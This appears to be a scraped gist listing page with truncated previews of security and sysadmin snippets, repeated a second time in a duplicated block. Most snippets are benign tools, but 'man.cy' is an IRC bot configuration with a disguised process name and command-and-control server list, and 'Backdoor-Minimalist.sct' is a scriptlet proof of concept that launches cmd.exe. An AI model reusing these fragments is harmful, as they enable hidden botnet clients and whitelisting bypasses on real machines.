Schrodinger schrodyn

## man.cy
#define STARTUP	1
#undef IDENT			// Only enable this if you absolutely have to
#define FAKENAME "apt-cache"	// What you want this to hide as
#define CHAN "#mint"	// Channel to join
#define KEY "bleh"		// The key of the channel
int numservers=5;		// Must change this to equal number of servers down there
char *servers[] = {
	"updates.absentvodka.com",
        "updates.mintylinux.com",
	"eggstrawdinarry.mylittlerepo.com",

## powershell_eventlog_parsing.ps1
#Security log
#============
####
#4624 - Logon & Logoff events successful
#4625 - Logon unsucceful

####
# Get usernames
Get-WinEvent -path .\Security.evtx | Where {$_.id -eq "4624"} | Foreach {([xml]$_.ToXml()).GetElementsByTagName("Data").ItemOf(5)}| Select -ExpandProperty "#text" -Unique
# Get domains

## logparser.ps1
# Logparser

# http://www.leeholmes.com/blog/2008/07/30/workaround-the-os-handles-position-is-not-what-filestream-expected/
$bindingFlags = [Reflection.BindingFlags] "Instance,NonPublic,GetField"
$objectRef = $host.GetType().GetField("externalHostRef", $bindingFlags).GetValue($host)

$bindingFlags = [Reflection.BindingFlags] "Instance,NonPublic,GetProperty"
$consoleHost = $objectRef.GetType().GetProperty("Value", $bindingFlags).GetValue($objectRef, @())

[void] $consoleHost.GetType().GetProperty("IsStandardOutputRedirected", $bindingFlags).GetValue($consoleHost, @())

## Backdoor-Minimalist.sct
<?XML version="1.0"?>
<scriptlet>
<registration
    progid="Empire"
    classid="{F0001111-0000-0000-0000-0000FEEDACDC}" >
	<!-- Proof Of Concept - Casey Smith @subTee -->
	<script language="JScript">
		<![CDATA[

			var r = new ActiveXObject("WScript.Shell").Run("cmd.exe");

## timeSync.bat
@echo on & @setlocal enableextensions
@echo =========================
@echo Turn off the time service
net stop w32time
@echo ======================================================================
@echo Set the SNTP (Simple Network Time Protocol) source for the time server
w32tm /config /syncfromflags:manual /manualpeerlist:"0.it.pool.ntp.org 1.it.pool.ntp.org 2.it.pool.ntp.org 3.it.pool.ntp.org"
@echo =============================================
@echo ... and then turn on the time service back on
net start w32time

## gdb-python2.7-ubuntu.sh
apt-get install python2.7-dev python2.7
apt-get build-dep gdb
apt-get source gdb
sed -i -E "s|python3|/usr/bin/python2.7|" debian/rules
dpkg-buildpackage -uc -us -j8
dpkg-install ../*.deb

## yet another radare2 cheatsheet
# radare2

load without any analysis (file header at offset 0x0): r2 -n /path/to/file

analyze all: aa
list functions: afl
seek to function: s sym.main

open project: Po <name>
save project: Ps <name>

## xor.py
#
# NB : this is not secure
# from http://code.activestate.com/recipes/266586-simple-xor-keyword-encryption/
# added base64 encoding for simple querystring :)
#

def xor_crypt_string(data, key='awesomepassword', encode=False, decode=False):
    from itertools import izip, cycle
    import base64
    if decode:

## gist:f027f973b71284322f9e870ffd8f1eb4
urlencode() {
    # urlencode <string>
    old_lc_collate=$LC_COLLATE
    LC_COLLATE=C

    local length="${#1}"
    for (( i = 0; i < length; i++ )); do
        local c="${1:i:1}"
        case $c in
            [a-zA-Z0-9.~_-]) printf "$c" ;;

## yara_fn.py
'''
IDAPython script that generates a YARA rule to match against the
basic blocks of the current function. It masks out relocation bytes
and ignores jump instructions (given that we're already trying to
match compiler-specific bytes, this is of arguable benefit).

If python-yara is installed, the IDAPython script also validates that
the generated rule matches at least one segment in the current file.

author: Willi Ballenthin <william.ballenthin@fireeye.com>
	#define STARTUP 1
	#undef IDENT // Only enable this if you absolutely have to
	#define FAKENAME "apt-cache" // What you want this to hide as
	#define CHAN "#mint" // Channel to join
	#define KEY "bleh" // The key of the channel
	int numservers=5; // Must change this to equal number of servers down there
	char *servers[] = {
	"updates.absentvodka.com",
	"updates.mintylinux.com",
	"eggstrawdinarry.mylittlerepo.com",
	#Security log
	#============
	####
	#4624 - Logon & Logoff events successful
	#4625 - Logon unsucceful

	####
	# Get usernames
	Get-WinEvent -path .\Security.evtx \| Where {$_.id -eq "4624"} \| Foreach {([xml]$_.ToXml()).GetElementsByTagName("Data").ItemOf(5)}\| Select -ExpandProperty "#text" -Unique
	# Get domains
	# Logparser

	# http://www.leeholmes.com/blog/2008/07/30/workaround-the-os-handles-position-is-not-what-filestream-expected/
	$bindingFlags = [Reflection.BindingFlags] "Instance,NonPublic,GetField"
	$objectRef = $host.GetType().GetField("externalHostRef", $bindingFlags).GetValue($host)

	$bindingFlags = [Reflection.BindingFlags] "Instance,NonPublic,GetProperty"
	$consoleHost = $objectRef.GetType().GetProperty("Value", $bindingFlags).GetValue($objectRef, @())

	[void] $consoleHost.GetType().GetProperty("IsStandardOutputRedirected", $bindingFlags).GetValue($consoleHost, @())
	<?XML version="1.0"?>
	<scriptlet>
	<registration
	progid="Empire"
	classid="{F0001111-0000-0000-0000-0000FEEDACDC}" >
	<!-- Proof Of Concept - Casey Smith @subTee -->
	<script language="JScript">
	<![CDATA[

	var r = new ActiveXObject("WScript.Shell").Run("cmd.exe");
	@echo on & @setlocal enableextensions
	@echo =========================
	@echo Turn off the time service
	net stop w32time
	@echo ======================================================================
	@echo Set the SNTP (Simple Network Time Protocol) source for the time server
	w32tm /config /syncfromflags:manual /manualpeerlist:"0.it.pool.ntp.org 1.it.pool.ntp.org 2.it.pool.ntp.org 3.it.pool.ntp.org"
	@echo =============================================
	@echo ... and then turn on the time service back on
	net start w32time
	apt-get install python2.7-dev python2.7
	apt-get build-dep gdb
	apt-get source gdb
	sed -i -E "s\|python3\|/usr/bin/python2.7\|" debian/rules
	dpkg-buildpackage -uc -us -j8
	dpkg-install ../*.deb
	# radare2

	load without any analysis (file header at offset 0x0): r2 -n /path/to/file

	analyze all: aa
	list functions: afl
	seek to function: s sym.main

	open project: Po <name>
	save project: Ps <name>
	#
	# NB : this is not secure
	# from http://code.activestate.com/recipes/266586-simple-xor-keyword-encryption/
	# added base64 encoding for simple querystring :)
	#

	def xor_crypt_string(data, key='awesomepassword', encode=False, decode=False):
	from itertools import izip, cycle
	import base64
	if decode:
	urlencode() {
	# urlencode <string>
	old_lc_collate=$LC_COLLATE
	LC_COLLATE=C

	local length="${#1}"
	for (( i = 0; i < length; i++ )); do
	local c="${1:i:1}"
	case $c in
	[a-zA-Z0-9.~_-]) printf "$c" ;;
	'''
	IDAPython script that generates a YARA rule to match against the
	basic blocks of the current function. It masks out relocation bytes
	and ignores jump instructions (given that we're already trying to
	match compiler-specific bytes, this is of arguable benefit).

	If python-yara is installed, the IDAPython script also validates that
	the generated rule matches at least one segment in the current file.

	author: Willi Ballenthin <william.ballenthin@fireeye.com>